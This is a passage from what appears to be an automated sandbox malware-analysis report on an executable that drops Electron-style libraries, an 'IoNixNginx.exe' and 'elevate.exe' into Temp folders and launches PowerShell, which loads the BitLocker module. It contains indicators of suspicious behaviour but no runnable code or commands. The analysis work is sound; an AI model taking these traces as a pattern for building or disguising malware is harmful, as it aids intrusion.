Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: AyqwnIUrcz.exeStatic PE information: certificate valid
Source: AyqwnIUrcz.exeStatic file information: File size 64824672 > 1048576
Source: AyqwnIUrcz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ffmpeg.dll.5.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.5.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.5.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe.5.drStatic PE information: section name: .00cfg
Source: IoNixNginx.exe.5.drStatic PE information: section name: .gxfg
Source: IoNixNginx.exe.5.drStatic PE information: section name: .retplne
Source: IoNixNginx.exe.5.drStatic PE information: section name: .rodata
Source: IoNixNginx.exe.5.drStatic PE information: section name: CPADinfo
Source: IoNixNginx.exe.5.drStatic PE information: section name: LZMADEC
Source: IoNixNginx.exe.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe.5.drStatic PE information: section name: malloc_h
Source: libEGL.dll.5.drStatic PE information: section name: .00cfg
Source: libEGL.dll.5.drStatic PE information: section name: .gxfg
Source: libEGL.dll.5.drStatic PE information: section name: .retplne
Source: libEGL.dll.5.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.5.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.5.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.5.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.5.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.5.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.5.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.5.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.5.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.5.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll0.5.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll0.5.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.5.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .00cfg
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .gxfg
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .retplne
Source: IoNixNginx.exe0.5.drStatic PE information: section name: .rodata
Source: IoNixNginx.exe0.5.drStatic PE information: section name: CPADinfo
Source: IoNixNginx.exe0.5.drStatic PE information: section name: LZMADEC
Source: IoNixNginx.exe0.5.drStatic PE information: section name: _RDATA
Source: IoNixNginx.exe0.5.drStatic PE information: section name: malloc_h
Source: libEGL.dll0.5.drStatic PE information: section name: .00cfg
Source: libEGL.dll0.5.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.5.drStatic PE information: section name: .retplne
Source: libEGL.dll0.5.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.5.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll0.5.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.5.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.5.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll0.5.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll0.5.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll0.5.drStatic PE information: section name: .retplne
Source: vulkan-1.dll0.5.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\IoNixNginx.exeJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user~1\AppData\Local\Temp\nslCD8A.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\LICENSE.electron.txtJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
